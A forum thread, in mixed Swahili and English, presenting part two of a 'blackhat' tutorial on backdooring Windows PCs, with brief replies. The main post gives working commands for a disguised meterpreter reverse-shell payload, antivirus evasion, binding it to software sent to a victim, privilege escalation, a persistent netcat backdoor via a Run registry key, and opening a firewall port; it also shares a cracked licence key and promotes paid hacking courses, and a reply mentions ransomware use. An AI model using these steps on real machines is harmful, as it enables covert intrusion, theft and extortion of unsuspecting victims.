[PART 2] Netcat advance blackhat hacking TUTORIAL >> hack windows pc + networks

Thefreedom

JF-Expert Member
Jan 27, 2019
319
313
HEY GUYS.........
Thefreedom is hereeeeeee.

karibu tena katika katika mwendelezo wetu wa
Netcat advance blackhat hacking TUTORIAL >> hack windows pc + networks
ambalo ni somo litakalo improve ur hacking skills kama wewe ni blackhat,grey hata white hackers
nimepokea requests kuhusu beginers ......wanashindwa elewa haya mambooooo.

ipo hivi kama wewe upo tayari na unauhitaji wa kujua haya mambo in deep na kujisecure unaweza buy my 2019 blackhat coarse ambayo utajifunza from A to Z ...mfumo wa ufundishaji ni videos zangu na kila kilichotumika utakipata ndani ya package .
Language ni KISWAHILI + ENGLISH
you can check hio screenshot hapo chini kuangalia outline coarse

cost. 35000 full package
nusu package ni 28500
robo package ni 20000
specific area ni 15000

kwa ambaye hatochukua full package atakosa topic hizi

1. web application hacking , servers, databases n.k in ADVANCE

2. SIM CARDS CLONING

3. ADVANCE NETCAT BACKDOOR + PERSISTENCE


NOTE>>>>>hakuna ulazima katika haya mambo cuz sio tegemezi sana kwangu ila kama hauna sources yyte ya kupiga kazi nakupaata ela ya ugalii unaweza tumia skills hii kugenerate kipato kwa njia ambayo ni legally.


1062378


lets START...............................................................

jana niliongelea netcat na tulifanikiwa kucheck na kugusa sehemu ambazo ni muhimu sana kabla ujaja kusoma huu mwendeelezo wa leo.

NOTE kama hukufanikiwa kupitia UZI wangu wa jana na kuifahamu netcat usije jaribu kusoma hadi mwisho huuu uzi wa leo maana hautoelewa kitu

pitia uzi wangu wa sehemu ya kwanza wa hii mada hapa https://bit.ly/2K5SR1r


BAADA ya kusema hivo leo tutaaangalia ni jinsi gani ya ku attack windows pcna kuweka netcat backdoor + persistence in advance

1062386



REQUIREMENTS

1. KALI MACHINE

2. windows machine
hapa unaweza install windows in virtual machine
download vm player hapa https://www.vmware.com/go/getplayer-win
use my lifetime cracked licence key (mult uses) VC7ER-0PG0P-480YQ-DFMGX-PKKYF

3. port forwarding
binafsi natumia router TP-LINK MR3420 kwangu ina work perfectly
na inatumia modem .
ALTERNATIVE
kama hauna router tumia portmap.io ku forwad port ip yao ya server 193.161.193.99 connection ipo vzr

4 . binders .. download my dangerous anonymous binders hapa https://my.pcloud.com/publink/show?code=XZXyyg7Z2kBW0YEcnw8aXtLTSAHm578JGcy0

siwez elekeza how to bind kwasabbu nimeshaonesha kwenye nyuzi zangu zilizopita unaweza ingia in my profile kwenye post utaona my previous posts .

HATUA ZA KUFUATA VERY EASY

1. OPen kali linux na tengenza backdoor kwa kutumia msfvenom kama victim hana antivirus .
kama anatumia windows 8-10 ujue lazima atakuwa anatumia windows defender na tuna weza bypass

how????
a) install mono package kwenye kali yako use my command "sudo apt install mono-devel"

b) git clone https://github.com/pasahitz/zirikatu

c) cd zirikatu && chmod +x zirikatu.sh

d) ./zirikatu.sh

utatumia option 1 windows/meterpreter/reverse_tcp

lhost weka ip kama umetumia portmap.io 193.161.193.99 , LPORT utaipata kwenye setup yako ya server uliofanya kwenye web ya portmap pia usisahau kudownload configuration file

bada ya hapo zirikatu itakuambia uchange payload icon hapo kwangu me sitaki kuchange cuz hii backdoor inaenda run kwnye task manager sasa kama victim atakuwa na knowledge akiona ina icon tofauti na ngen kwake anaweza end process.

pia kwenye desplay error message nitaweka no cuz nitabind na software ingine ya windows .
backdoor output name weka jina ambalo ni zuri mfano WindowsUpdater kule kwenye task manager akichungulia hatokuwa dought nayo cuz atajua ni normal windows application kumbe ni backdoor yetu

kisha press Enter na itagenerate ur backdoor.

kwa wale blackahats unaweza fanya iviiiiiii

msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP" LPORT="weka port" -a x86 -f exe > windowsupdater.exe


sasa hio ni detectable >>>>> lets make undectetable >>> use cyberseal crypter download https://my.pcloud.com/publink/show?code=XZekE67ZzFOu5Q2aL3VgddS6LvlNGF1PH2kV cracked lifetime

1062410


hio ndo crypter pekeee ambayo hadi sasa microsoft wamenyooosha mkono kunyaka na huipati freee easy easy

2. kubind + start listener
hapa utabind na software yyte ile backdoor yetu kisha mtumie victim
soon baada ya kutumia anzisha mfconsole

type msfconsole in terminal yako ya linux ...kisha weka code moja moja hizi

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost "weka serbver ambayo uliweka kwenye creation ya backdoor yako"

set lport "weka port"

set ExitOnSession false

kisha exploit -j

victim akiiinstall ile software huku kwetu tutapata connection like this

1062412


sasa baada ya hapo unatakiwa ku note kitu ...lazima utype "sysinfo" kuchek name ya pc yake + all details + architecture (32bit or 64bit)

ukiona umepata 64 bit kama architecture hapo unatakiwa ku hack 32 bit ili tupate admin permission 100%
lakini ukijaribu kurun "getsystem" na "getprivs" ukion ujapata error ujue u have admin permissions 100%

sasa what if kam umepata error .....!!! how to get admin permissions????

kwanza unatakiwa kuwa na akiliiiiiii ...........
tutaenda uliza maswali processor na soon ikijibu WE ARE IN............................awesome

sasa pale ulipo kwenye meterperter type background

then clear

baada ya hapo tuongeza exploit type

use exploit/windows/local/ask
set SESSION 1
set TECHNIQUE PSH
run


UKIRUN hio kule kwa victim itapop up cmd makusudi yeye anaweza fikiria mouse ndo imejibonyeza akigusa chchte au akipress OK >>>>>>>>>>>>>>>WE ARE IN ...IN 32 BIT

utapata session 2 ambayo ndio iko kwnye 32 bit >>>>sasa hapa tuna dominate pc
now tunaenda upload our own netcat exe

type upload /usr/share/windows-binaries/nc.exe c:\\Windows\\System32

ukipress enter itaenda upload mfano ikikaaataaa unawza upload hata hapa C:\\Users\\Public

kisha
ukaaandika shell na system itakupa cmd ya victim na utaenda directory hio
c:\users\public alafu utamove manual kwa cmd

move nc.exe c:\Windows\System32

Baada ya hapo sasa tunaweka persistence netcat backdoor
kwenye meterpreter type this

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v nc -d '"c:\\Windows\\Sytsem32\\nc.exe" -Ldp 3000 -e cmd.exe'

ukipress enter itakuambia succesful SET

hiii inamaanisha kwamba huyu victim akiwasha pc mda wowote processor i start up netcat na netcat automatical iopen port 3000 na istart ku listen any connection kwenye hio port 3000 na wakati wa kulisten i export cmd. exe ikwa ajili yetu .......very dangerous

baada ya kuset hivo unachotakiwa ni kumark local ip adress ya pc yake ... utaipata tu kwenye meterpretert
type shell kisha ikija CMD yake type ipconfig

sasa
hapo tumefanikiwa kuset backdoor swali ni kwamba ikiopen hio port je firewall zitanyamaza?

jibu ni kwamba lazima zitabroke........................................


sasa basi tutaiomba firewall permision isibroke hiii process yetu

kwenye meterpreter type shell itakuja CMD ya huyo victim sasa type this command

netsh firewall add portopening TCP 3000 "Service Firewall" ENABLE ALL

Hapo bila error itakuambia command excuted successfully

kwa hio sasa siku ingine pc ya victim ikiwaka wewe easy washa linux yako

type nc -nv "ip yake" 3000

itakuja
windows cmd yake na unaweza ukarun chchte na ku excute chchote hadi kushutdown pc yani kila kitu as admin


GUYS THANKS FOR LISTENING
SEE YOU NEXT TIME

Thefreedom
 
Mkuu Mimi Natafuta Image Kali Linux Nifanye Dual Boot Na Windows Kwenye PC Yangu-- Naeza Kuipata Kwako?


Sent from my iPhone using JamiiForums
 
mkuu nipe maelezo kidogo kuhusu hiyo github.com niliingia hapo nikawa nashangaa shanga tu!
 
mkuu nipe maelezo kidogo kuhusu hiyo github.com niliingia hapo nikawa nashangaa shanga tu!
Github ni web based hosting service ambayo unacontrol kwa kutumia Git , na hutumika sana na programmers kuistore computer codes..... Sasa hio ni account yangu ambayo nimepandisha my coded hacking programs ambazo nimeandika kwa lugha tofauti na mchanganyiko

Python, perl, bash, n. K
 
Usiiiifanye dual boot itakukeraaaa

Itanikeraje Mkuu! Nilishafanyaga Ubuntu Na Windows 7, Pia BackTrack 5 Na Windows 8.1, Zilikua Zinapiga Vzur, Kali Ilikataa Kwa Sababu Image Yake Ilikuwa Haiko Poa


Sent from my iPhone using JamiiForums
 
Github ni web based hosting service ambayo unacontrol kwa kutumia Git , na hutumika sana na programmers kuistore computer codes..... Sasa hio ni account yangu ambayo nimepandisha my coded hacking programs ambazo nimeandika kwa lugha tofauti na mchanganyiko

Python, perl, bash, n. K
This
 
Mkuu The freedom hapo naona kwa hacker yeyote kuna ulazima wa kujua both Linux and windows commands na sio Linux pekee yake .. Kwa sabab baada ya kutakeover victim machine utahitaji kurun commands kwenye cmd ya victim.. Au kuna njia yoyote ya kurun Linux commands kwenye windows cmd ya victim baada ya kuitakeover??
 
Mkuu The freedom hapo naona kwa hacker yeyote kuna ulazima wa kujua both Linux and windows commands na sio Linux pekee yake .. Kwa sabab baada ya kutakeover victim machine utahitaji kurun commands kwenye cmd ya victim.. Au kuna njia yoyote ya kurun Linux commands kwenye windows cmd ya victim baada ya kuitakeover??
Yah ni lazima maaana akiiiiwasha pc baada ya kuattack ile backdoor itaexport cmd yake na firewall itaopen port ambayo umeeeweka sasa wewe ukiconnect utapata cmd yake.... Sasa unahitajika kuijua cmd vzr

Ila wengi njia hiii wanatumiaga kupiga ransomeware pale endapo wakiiipata hio connection wana run script na programs + ransomware
 
Back
Top Bottom